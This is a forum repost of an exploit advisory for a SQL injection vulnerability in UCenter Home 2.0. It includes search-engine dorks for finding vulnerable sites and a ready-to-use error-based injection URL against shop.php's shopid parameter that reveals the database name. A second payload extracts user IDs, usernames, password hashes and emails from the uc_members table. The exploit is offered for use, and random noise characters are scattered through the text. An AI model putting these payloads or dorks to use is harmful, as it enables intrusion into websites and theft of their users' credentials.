! |- I+ I | a7 Z' C4 B" C
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
" l [2 a/ e, C( [$ S. w }' o9 n9 u# P8 F
6 z/ L, \! I- _6 \
) M: s' J/ u& H: C& Y
* o5 k2 S& w0 L" T' ?/ [*/ Author : KnocKout , p' n' P% L4 b. d1 }
/ `0 e% S; i1 J1 ?+ O*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers s# k4 B/ B3 t
: f/ b( e7 D% {; H4 K9 n
*/ Contact: knockoutr@msn.com
! `1 Z. x" [ B; p! e. F8 D1 R1 B: m9 H' M( D l5 Q+ O9 N
*/ Cyber-Warrior.org/CWKnocKout + D0 |) L, M6 r, R# ?9 n
& _ k2 A# C% E/ j# J
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
$ E: ^! A( S9 L9 i0 h# ^" M
* S. R: \ g# B! w; bScript : UCenter Home
* m- F% k v$ a' J
3 r A, |# q6 R! k7 ?: Q' ?Version : 2.0
4 F+ ~; j+ y" K# c) \8 q+ Y6 v' W1 @2 l$ u& J$ i% S& q
Script HomePage : http://u.discuz.net/ 9 o% J% N( D: _& a
9 J6 v) r5 _2 R) z
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
3 W1 W3 F9 O$ C2 f2 I* S' G' H
2 J" E. e) M/ U' mDork : Powered by UCenter inurl:shop.php?ac=view / ^& r! G/ Y& J& Q3 X
) N9 t# L# i9 K& sDork 2 : inurl:shop.php?ac=view&shopid=
# w$ s3 f8 _* |) s5 x4 t! M- U1 S- Y4 f
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
- ? V* a' i i- ]3 `/ g/ ~6 j z7 H0 z, Y. h- g7 z: E) T; W
Vuln file : Shop.php
# T! w' ^& h0 i
/ k7 |! t, `5 l; Gvalue's : (?)ac=view&shopid= q: s8 |- _$ G1 L. S
8 G; Z8 P& D( }9 p. o, n& t; N
Vulnerable Style : SQL Injection (MySQL Error Based)
+ p# V, Z3 v: o/ h( D% U4 V2 I5 ]! r f0 ^3 c$ X
Need Metarials : Hex Conversion
% @2 u( d- y8 m* t) u4 T
: I; H4 _- {: O__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ! }% Y; \. Q$ ^. d6 g
! b) ^8 x/ n. yYour Need victim Database name. ~9 s, X! T9 D4 ]$ v" ]4 o) z
( C( _; I9 \- o& w1 v+ }for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
8 Z+ n, R% j, Q `% h, z& h t! y# j+ F+ {& K
..
5 A; U. @( F+ i( G3 A1 g4 q7 ~* @; X
DB : Okey. 8 t& w$ s. ~: f4 C+ \, L
" @: l' ?. i+ C3 Nyour edit DB `[TARGET DB NAME]` & E% D: _+ L% r6 L ]; ~
* }1 w$ Q6 A8 N) w) wExample : 'hiwir1_ucenter'
: H; G8 I! D/ e8 O0 Y( X6 R; [
Edit : Okey. ; @& X8 E' Q; C, m
2 n5 o- V$ k6 |. f7 ^; `7 g" c
Your use Hex conversion. And edit Your SQL Injection Exploit.. $ i# V7 A- y4 T# H% r$ W5 |, e
" n& n& x- @3 l$ M- V
! O/ U1 I$ S; B2 H! G7 t1 F: T) l: d0 y* `! E: S
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
; J$ r* l. P5 m2 z |
发表于 2013-2-27 21:31:31
收藏
支持
反对